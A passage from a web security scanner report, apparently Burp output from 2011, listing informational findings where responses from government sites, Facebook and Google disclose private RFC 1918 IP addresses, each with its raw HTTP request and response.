Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=62; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=62&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 34453
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<script type="text/javascript"> var mboxServerIp = '10.40.96.102';</script>
...[SNIP]...

23.7. http://www.ag.ny.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ag.ny.gov
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ag.ny.gov
Proxy-Connection: keep-alive
Referer: http://www.oag.state.ny.us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=69751567.1304117377.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69751567.1583628114.1304117377.1304117377.1304117377.1; __utmc=69751567; __utmb=69751567.2.10.1304117377

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 29 Apr 2011 22:50:24 GMT
Content-type: text/html
Content-Length: 19025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form method="get" action="http://172.20.100.73/search">
...[SNIP]...

23.8. http://www.archives.gov/shop/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /shop/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /shop/ HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/military-service-records/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30295279.1304124528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30295279.300828153.1304124528.1304124528.1304124528.1; __utmc=30295279; __utmb=30295279.2.10.1304124528; fsr.s={"v":1,"rid":"1304124556632_237243","pv":2,"to":5,"c":"http://www.archives.gov/veterans/military-service-records/","lc":{"d0":{"v":2,"s":false}},"sd":0,"f":1304124560808}

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>Shop</title>
<meta ht
...[SNIP]...
<form action="http://172.29.0.128/query.html" method="get" name="search">
...[SNIP]...

23.9. http://www.archives.gov/veterans/evetrecs/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /veterans/evetrecs/index.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /veterans/evetrecs/index.html HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 00:48:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
refresh: 5; URL=/veterans/military-service-records/
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title> File Moved During th
...[SNIP]...
<form action="http://172.29.0.128/query.html" method="get" name="search">
...[SNIP]...

23.10. http://www.archives.gov/veterans/military-service-records/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.archives.gov
Path:   /veterans/military-service-records/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /veterans/military-service-records/ HTTP/1.1
Host: www.archives.gov
Proxy-Connection: keep-alive
Referer: http://www.archives.gov/veterans/evetrecs/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30295279.1304124528.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30295279.300828153.1304124528.1304124528.1304124528.1; __utmc=30295279; __utmb=30295279.1.10.1304124528; fsr.s={"v":1,"rid":"1304124556632_237243","pv":1,"to":3,"c":"http://www.archives.gov/veterans/evetrecs/index.html","lc":{"d0":{"v":1,"s":false}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:48:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>Start Your Military S
...[SNIP]...
<form action="http://172.29.0.128/query.html" method="get" name="search">
...[SNIP]...

23.11. http://www.facebook.com/TeamHaslam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TeamHaslam

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /TeamHaslam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=Pi-Op; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.9.128
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 135590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

23.12. http://www.facebook.com/WSDOL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WSDOL

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /WSDOL HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=IdulS; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.231.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:14 GMT
Content-Length: 165238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

23.13. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Mon, 30-May-2011 12:32:06 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.248.108
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 0


23.14. http://www.facebook.com/note.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /note.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /note.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=DNT-Q; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.234.113
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 13344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.15. http://www.facebook.com/ohiodivisionofwatercraft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ohiodivisionofwatercraft

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /ohiodivisionofwatercraft HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=-xzbm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:07 GMT
Content-Length: 45188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
y {window[\"swf_4949752878_fbswf_4dbc01477bf639479560873\"] = new SWFObject(\"http:\\\/\\\/www.youtube.com\\\/v\\\/3Xh63QYo4RY\", \"swf_4949752878_fbswf_4dbc01477bf639479560873\", \"520\", \"413\", [\"10.0.22.87\"], \"000000\");swf_4949752878_fbswf_4dbc01477bf639479560873.addParam(\"allowScriptAccess\", \"never\");swf_4949752878_fbswf_4dbc01477bf639479560873.addParam(\"fbjs\", \"_id_4dbc01477bf6f2a04039008\")
...[SNIP]...
nction() {\n var swf;\n try {window[\"so_swf_fbjs\"] = new SWFObject(\"http:\\\/\\\/www.facebook.com\\\/swf\\\/canvas\\\/fbjs.swf?3\", \"so_swf_fbjs\", \"100\\u0025\", \"100\\u0025\", [\"10.0.22.87\"], \"#FFFFFF\");so_swf_fbjs.addParam(\"wmode\", \"transparent\");so_swf_fbjs.addParam(\"allowFullScreen\", \"true\");so_swf_fbjs.addParam(\"allowScriptAccess\", \"always\");so_swf_fbjs.addParam(\"sal
...[SNIP]...

23.16. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Austin-TX/Texasgov/117263931626845

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/Austin-TX/Texasgov/117263931626845 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/Texasgov/117263931626845
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=rq3rc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.248.121
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


23.17. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/WildlifeResourcesDivisionGADNR
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=0Ak4_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.11.117
Connection: close
Date: Sat, 30 Apr 2011 12:32:08 GMT
Content-Length: 0


23.18. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=ondUt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.229.123
Connection: close
Date: Sat, 30 Apr 2011 12:32:09 GMT
Content-Length: 0


23.19. http://www.facebook.com/photo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /photo.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /photo.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=9bvPF; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.206.101
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 11367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.20. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.198.124
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 7925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.21. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.utah.gov/pmn/sitemap/notice/67945.html&amp;layout=standard&amp;show_faces=false&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/pmn/sitemap/notice/67945.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.54
X-Cnection: close
Date: Sat, 30 Apr 2011 11:24:16 GMT
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.22. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=cFyQm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.200.118
Connection: close
Date: Sat, 30 Apr 2011 12:32:12 GMT
Content-Length: 10404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.23. http://www.facebook.com/video/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /video/video.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /video/video.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/video/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=SpXAc; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.247.111
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 0


23.24. http://www.google.com/sdch/rU20-FBA.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/rU20-FBA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/rU20-FBA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE
If-Modified-Since: Thu, 28 Apr 2011 23:48:00 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Fri, 29 Apr 2011 22:01:28 GMT
Date: Fri, 29 Apr 2011 22:36:23 GMT
Expires: Fri, 29 Apr 2011 22:36:23 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 96018

Domain: .google.com
Path: /search

<!doctype html><head><title>used car<!doctype html><head><title>direct - Google Search</title><script>window.google={kEI:" WJ_5AK2N-RqwM",kEXPI:"25907,2
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0C
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: mXEkS0TMcmsJ:www.edmunds.com/used-cars/+used+car &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CD
...[SNIP]...
